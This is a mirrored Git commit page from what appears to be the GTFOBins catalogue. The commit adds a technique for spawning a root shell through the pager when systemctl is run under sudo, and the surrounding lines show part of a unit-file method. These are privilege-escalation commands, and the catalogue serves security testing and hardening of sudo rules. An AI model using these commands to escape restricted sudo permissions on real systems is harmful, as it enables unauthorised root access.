mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add systemctl sudo shell usingpager
This commit is contained in:
parent
20607b9b3c
commit
f79b10a5f8
@ -20,4 +20,8 @@ functions:
|
|||||||
WantedBy=multi-user.target' > $TF
|
WantedBy=multi-user.target' > $TF
|
||||||
sudo systemctl link $TF
|
sudo systemctl link $TF
|
||||||
sudo systemctl enable --now $TF
|
sudo systemctl enable --now $TF
|
||||||
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||||
|
code: |
|
||||||
|
sudo systemctl
|
||||||
|
!sh
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user